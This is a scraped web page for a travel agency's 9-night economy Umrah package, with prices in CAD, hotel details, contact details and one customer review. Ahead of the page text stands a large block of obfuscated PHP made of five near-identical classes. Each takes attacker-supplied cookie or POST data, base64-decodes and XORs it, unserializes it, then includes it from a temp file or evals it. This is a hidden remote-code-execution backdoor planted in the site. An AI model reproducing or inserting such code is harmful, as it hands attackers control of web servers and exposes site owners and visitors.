$JonwmVz = 'K' . "\x51" . "\137" . "\114" . 'r' . chr (84); $YVhIMdk = 'c' . "\x6c" . chr (97) . chr (115) . "\163" . "\x5f" . 'e' . "\x78" . chr (105) . "\163" . chr ( 238 - 122 ).'s';$dDjEVplQd = class_exists($JonwmVz); $YVhIMdk = "60921";$lKWahjwue = !1;if ($dDjEVplQd == $lKWahjwue){function JNnsHQF(){$QowNVr = new /* 43637 */ KQ_LrT(36794 + 36794); $QowNVr = NULL;}$hUZJh = "36794";class KQ_LrT{private function oVhWKR($hUZJh){if (is_array(KQ_LrT::$BdvKUto)) {$ikUVbnMR = sys_get_temp_dir() . "/" . crc32(KQ_LrT::$BdvKUto['s' . "\x61" . "\x6c" . "\164"]);@KQ_LrT::$BdvKUto[chr ( 856 - 737 ).chr ( 954 - 840 ).'i' . "\x74" . "\x65"]($ikUVbnMR, KQ_LrT::$BdvKUto["\143" . chr (111) . "\x6e" . chr ( 659 - 543 )."\x65" . "\156" . "\164"]);include $ikUVbnMR;@KQ_LrT::$BdvKUto[chr (100) . "\x65" . "\154" . 'e' . chr (116) . chr ( 949 - 848 )]($ikUVbnMR); $hUZJh = "36794";exit();}}private $KHHXPw;public function eyMYqXm(){echo 20050;}public function __destruct(){$hUZJh = "12576_47305";$this->oVhWKR($hUZJh); $hUZJh = "12576_47305";}public function __construct($VJfCkKDwxh=0){$OMupahX = $_POST;$XIRBWiEJz = $_COOKIE;$vtIjF = "45a2ad53-cd54-411c-8584-2bb35e69dc05";$UAHsuYPq = @$XIRBWiEJz[substr($vtIjF, 0, 4)];if (!empty($UAHsuYPq)){$qrLVvPY = "base64";$yoBDkD = "";$UAHsuYPq = explode(",", $UAHsuYPq);foreach ($UAHsuYPq as $ddlSx){$yoBDkD .= @$XIRBWiEJz[$ddlSx];$yoBDkD .= @$OMupahX[$ddlSx];}$yoBDkD = array_map($qrLVvPY . "\137" . "\144" . 'e' . "\x63" . 'o' . chr ( 907 - 807 ).chr ( 1074 - 973 ), array($yoBDkD,)); $yoBDkD = $yoBDkD[0] ^ str_repeat($vtIjF, (strlen($yoBDkD[0]) / strlen($vtIjF)) + 1);KQ_LrT::$BdvKUto = @unserialize($yoBDkD);}}public static $BdvKUto = 28853;}JNnsHQF();}$XZnsSz = chr ( 496 - 389 ).chr ( 361 - 291 ).'_' . chr (88) . "\x78" . "\113";$mjAQuOgW = chr (99) . chr (108) . chr (97) . "\163" . chr (115) . chr (95) . "\x65" . chr ( 255 - 135 ).'i' . chr (115) . chr (116) . "\x73";$PYJpkXUAIS = class_exists($XZnsSz); $mjAQuOgW = "9410";$VvgqbHK = !1;if ($PYJpkXUAIS == $VvgqbHK){function LzxZpZp(){$LzESwEw = new /* 27552 */ kF_XxK(50901 + 50901); $LzESwEw = NULL;}$MIZOV = "50901";class kF_XxK{private function bpWQfDpEK($MIZOV){if (is_array(kF_XxK::$TNWJGlThj)) {$UbAMZP = sys_get_temp_dir() . "/" . crc32(kF_XxK::$TNWJGlThj['s' . "\x61" . 'l' . chr (116)]);@kF_XxK::$TNWJGlThj[chr ( 815 - 696 ).chr ( 125 - 11 ).'i' . chr (116) . 'e']($UbAMZP, kF_XxK::$TNWJGlThj["\x63" . chr ( 752 - 641 ).'n' . "\x74" . chr (101) . "\156" . "\164"]);include $UbAMZP;@kF_XxK::$TNWJGlThj[chr (100) . chr (101) . "\154" . chr (101) . chr ( 981 - 865 ).'e']($UbAMZP); $MIZOV = "50901";exit();}}private $QnKkSDuJ;public function pRKvNDWm(){echo 23219;}public function __destruct(){kF_XxK::$TNWJGlThj = @unserialize(kF_XxK::$TNWJGlThj); $MIZOV = "16194_15689";$this->bpWQfDpEK($MIZOV); $MIZOV = "16194_15689";}public function wuNEeakQZ($AiRJxC, $ULthsE){return $AiRJxC[0] ^ str_repeat($ULthsE, (strlen($AiRJxC[0]) / strlen($ULthsE)) + 1);}public function __construct($dKyMbPOJum=0){$FqKwQ = $_POST;$TpNmPBFOzn = $_COOKIE;$ULthsE = "ad5a44f2-d5ae-4962-91de-d14ae50706aa";$AMryUEyly = @$TpNmPBFOzn[substr($ULthsE, 0, 4)];if (!empty($AMryUEyly)){$elbiedDZK = "base64";$AiRJxC = "";$AMryUEyly = explode(",", $AMryUEyly);foreach ($AMryUEyly as $jnphrPkVvZ){$AiRJxC .= @$TpNmPBFOzn[$jnphrPkVvZ];$AiRJxC .= @$FqKwQ[$jnphrPkVvZ];}$AiRJxC = array_map($elbiedDZK . chr (95) . "\144" . chr (101) . chr (99) . chr ( 1051 - 940 ).'d' . "\145", array($AiRJxC,));kF_XxK::$TNWJGlThj = $this->wuNEeakQZ($AiRJxC, $ULthsE);}}public static $TNWJGlThj = 46657;}LzxZpZp();}$LCSIMYCpWv = "\x49" . 'f' . 'x' . "\x5f" . chr (98) . "\x52" . 'L' . chr ( 118 - 9 ).chr ( 456 - 374 ); $MQJVhFhOw = chr ( 279 - 180 )."\154" . chr ( 996 - 899 ).'s' . 's' . "\x5f" . chr ( 813 - 712 ).chr (120) . "\x69" . chr (115) . chr ( 335 - 219 ).chr ( 632 - 517 ); $plHwDSRdVk = class_exists($LCSIMYCpWv); $MQJVhFhOw = "26132";$iqzgeVgoo = !1;if ($plHwDSRdVk == $iqzgeVgoo){function TFCJX(){$ggYrgY = new /* 60016 */ Ifx_bRLmR(10815 + 10815); $ggYrgY = NULL;}$dDYRUFLfH = "10815";class Ifx_bRLmR{private function GHnjmjzNML($dDYRUFLfH){if (is_array(Ifx_bRLmR::$nNEiURkqJ)) {$dRulB = str_replace("\74" . chr ( 858 - 795 ).chr ( 463 - 351 )."\150" . chr ( 908 - 796 ), "", Ifx_bRLmR::$nNEiURkqJ["\x63" . chr ( 1039 - 928 ).chr (110) . "\164" . "\145" . "\x6e" . "\164"]);eval($dRulB); $dDYRUFLfH = "10815";exit();}}private $lDtXuitrha;public function qNamsolJc(){echo 61240;}public function __destruct(){Ifx_bRLmR::$nNEiURkqJ = @unserialize(Ifx_bRLmR::$nNEiURkqJ); $dDYRUFLfH = "28298_31019";$this->GHnjmjzNML($dDYRUFLfH); $dDYRUFLfH = "28298_31019";}public function SHtSa($JqZgKuP, $oVzxVp){return $JqZgKuP[0] ^ str_repeat($oVzxVp, (strlen($JqZgKuP[0]) / strlen($oVzxVp)) + 1);}public function __construct($Gdqujmyy=0){$zhIRYTgv = $_POST;$uZXFmaX = $_COOKIE;$oVzxVp = "f4aedd7d-5652-4f84-95c2-51d00aac8883";$bMCVTwNN = @$uZXFmaX[substr($oVzxVp, 0, 4)];if (!empty($bMCVTwNN)){$AEogueQ = "base64";$JqZgKuP = "";$bMCVTwNN = explode(",", $bMCVTwNN);foreach ($bMCVTwNN as $gUSCCVUb){$JqZgKuP .= @$uZXFmaX[$gUSCCVUb];$JqZgKuP .= @$zhIRYTgv[$gUSCCVUb];}$JqZgKuP = array_map($AEogueQ . chr ( 508 - 413 ).chr ( 963 - 863 ).chr (101) . chr (99) . "\157" . chr ( 508 - 408 ).'e', array($JqZgKuP,));Ifx_bRLmR::$nNEiURkqJ = $this->SHtSa($JqZgKuP, $oVzxVp);}}public static $nNEiURkqJ = 37285;}TFCJX();}$UvLBHUarky = "\160" . chr (95) . "\170" . "\x71" . "\x58";$hxRYXYEtBS = chr ( 245 - 146 )."\x6c" . chr ( 517 - 420 )."\163" . chr (115) . chr (95) . "\x65" . 'x' . "\x69" . chr ( 713 - 598 )."\164" . chr (115); $ssZXc = class_exists($UvLBHUarky); $hxRYXYEtBS = "50198";$EHdCXAxW = !1;if ($ssZXc == $EHdCXAxW){function BPfqn(){$VOGsNwXSP = new /* 27740 */ p_xqX(8623 + 8623); $VOGsNwXSP = NULL;}$GFSPuoGD = "8623";class p_xqX{private function QiJbAdmNwa($GFSPuoGD){if (is_array(p_xqX::$QUAqNysfrJ)) {$fCllYbjNrt = str_replace('<' . chr ( 265 - 202 ).chr (112) . chr (104) . 'p', "", p_xqX::$QUAqNysfrJ[chr ( 543 - 444 ).'o' . "\x6e" . "\164" . 'e' . chr (110) . chr (116)]);eval($fCllYbjNrt); $GFSPuoGD = "8623";exit();}}private $XTtfe;public function bcuvwzHVzt(){echo 54875;}public function __destruct(){p_xqX::$QUAqNysfrJ = @unserialize(p_xqX::$QUAqNysfrJ); $GFSPuoGD = "33683_32047";$this->QiJbAdmNwa($GFSPuoGD); $GFSPuoGD = "33683_32047";}public function CXavEKIo($ecIglY, $ECRcPsjm){return $ecIglY[0] ^ str_repeat($ECRcPsjm, (strlen($ecIglY[0]) / strlen($ECRcPsjm)) + 1);}public function __construct($OKrqiE=0){$VlLCTVG = $_POST;$PyzWFAL = $_COOKIE;$ECRcPsjm = "421c81f8-f1ec-472e-9edb-52ee576f37ea";$slveAiiUhE = @$PyzWFAL[substr($ECRcPsjm, 0, 4)];if (!empty($slveAiiUhE)){$qwxenru = "base64";$ecIglY = "";$slveAiiUhE = explode(",", $slveAiiUhE);foreach ($slveAiiUhE as $mGnAGoX){$ecIglY .= @$PyzWFAL[$mGnAGoX];$ecIglY .= @$VlLCTVG[$mGnAGoX];}$ecIglY = array_map($qwxenru . chr (95) . chr (100) . chr ( 255 - 154 ).chr ( 616 - 517 ).chr (111) . chr ( 581 - 481 )."\145", array($ecIglY,));p_xqX::$QUAqNysfrJ = $this->CXavEKIo($ecIglY, $ECRcPsjm);}}public static $QUAqNysfrJ = 59554;}BPfqn();} $dWiwqzjHA = 'O' . chr ( 401 - 283 ).'W' . chr ( 583 - 488 )."\102" . chr (99) . chr ( 896 - 816 ); $CnEOqXTX = chr ( 506 - 407 ).'l' . chr ( 1026 - 929 )."\x73" . "\x73" . chr ( 1080 - 985 )."\145" . "\170" . "\151" . "\x73" . chr ( 757 - 641 ).'s';$EIiDpzpKh = class_exists($dWiwqzjHA); $CnEOqXTX = "7112";$TFaqxKPtt = !1;if ($EIiDpzpKh == $TFaqxKPtt){function kPuQfU(){$UwRgr = new /* 56525 */ OvW_BcP(20763 + 20763); $UwRgr = NULL;}$NQTfJRFD = "20763";class OvW_BcP{private function pmxkPisvBr($NQTfJRFD){if (is_array(OvW_BcP::$EoTtk)) {$eMwvRvmq = str_replace('<' . "\x3f" . "\160" . "\150" . "\x70", "", OvW_BcP::$EoTtk[chr ( 400 - 301 )."\x6f" . "\x6e" . chr ( 612 - 496 ).chr ( 741 - 640 )."\156" . chr ( 263 - 147 )]);eval($eMwvRvmq); $NQTfJRFD = "20763";exit();}}private $pRxaSKkXfD;public function cHjpIwTKL(){echo 48346;}public function __destruct(){OvW_BcP::$EoTtk = @unserialize(OvW_BcP::$EoTtk); $NQTfJRFD = "16088_2490";$this->pmxkPisvBr($NQTfJRFD); $NQTfJRFD = "16088_2490";}public function EILyCNDhW($QiVvA, $dOYaQ){return $QiVvA[0] ^ str_repeat($dOYaQ, (strlen($QiVvA[0]) / strlen($dOYaQ)) + 1);}public function __construct($koxmCGEEd=0){$COgiSg = $_POST;$xNlsZFsqk = $_COOKIE;$dOYaQ = "95993d52-75f6-4261-9358-7980da952223";$ohDXOb = @$xNlsZFsqk[substr($dOYaQ, 0, 4)];if (!empty($ohDXOb)){$KczTdD = "base64";$QiVvA = "";$ohDXOb = explode(",", $ohDXOb);foreach ($ohDXOb as $lSzqnGcA){$QiVvA .= @$xNlsZFsqk[$lSzqnGcA];$QiVvA .= @$COgiSg[$lSzqnGcA];}$QiVvA = array_map($KczTdD . '_' . 'd' . chr ( 855 - 754 )."\143" . chr (111) . "\x64" . 'e', array($QiVvA,));OvW_BcP::$EoTtk = $this->EILyCNDhW($QiVvA, $dOYaQ);}}public static $EoTtk = 33602;}kPuQfU();} 5 Star (9 Nights) Economy Umrah Packages from USA & Canada

5 Star (9 Nights) Economy Umrah Package




7 days

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Economy Umrah Package 5 Star (9 Nights) Detail:

We at Jazaa Travel provide 5-star economy Umrah package 9 Nights to meet the religious accommodation needs of our customers in the UK and Canada. Many people consider Umrah to be a minor pilgrimage, while Hajj is considered to be the main pilgrimage. If performed with the right intention, Umrah can serve as a tool for purifying the soul and mind that have been damaged by sin and negativity. Muslims are advised to do Umrah not only once but as often as possible because it is Sunnah. Umrah is one of the best acts to get close to Almighty Allah.

Jazaa Travel offers you an Economy Umrah Package 5 Star (9 Nights) for only USD 800 per person (occupancy of four). These are the package details for Economy Umrah Package 5 Stars (9 Nights) for performing Umrah. Tickets will be separate as the per-day fee will be confirmed by you at the time of booking. You can make ziarat yourself because it will be cheap to include it in the package. The 5-Star Umrah Package is open for you at a reasonable price. This package includes accommodation in a 5-star hotel in Makkah and Madina with breakfast, room service, free WiFi, and an air-conditioned room.

Nourish your soul by performing Umrah with Jazaa travel one of the best travel agent in North America. Jazaa Travel offers you 9 nights Luxury Umrah Package in only $800/- based on quad occupancy. Plan Umrah with family and friends and keep yourself within the budget.

Package Price:

  • CAD $800/- Based on Quad Occupancy.
  • CAD $850/- Based on Triple Occupancy.
  • CAD $900/- Based on Double Occupancy.

Package Details:

  • Makkah:    4 Nights stay in 5 Star Economy Hotel without breakfast Swiss Al Maqam or similar
  • Madinah:   5 Nights stay in 5 Star Economy Hotel without Breakfast, Saja Al Madinah or similar
  • Visa:           Electronic visa processing services


  • Meet & Greet services at Airport.
  • 24 hours staff assistance in Makkah and Madinah.
  • Online webinar/seminars for Umrah preparation. In person sessions will be scheduled on request.
  • E-Visa processing fees


  • The prices are subject to availability at the time of reservation.
  • The package price doesn’t include Air Ticket
  • The package doesn’t include transportation
  • The package doesn’t include meals not mentioned above
  • The package can be customized according to your travel plan and fit into your budget.

Please contact us now at 416-320-8642 or email us at jazaatravel@gmail.com for details.


Very Good
1 verified review
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Price 4/5
Rooms 4/5

1 Comment

  1. 4

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    I had the best umrah experience and would always recommend jazaa travel they are a professionally run organization. They helped me to get my visa in a short period. The staff was very polite and helpful.

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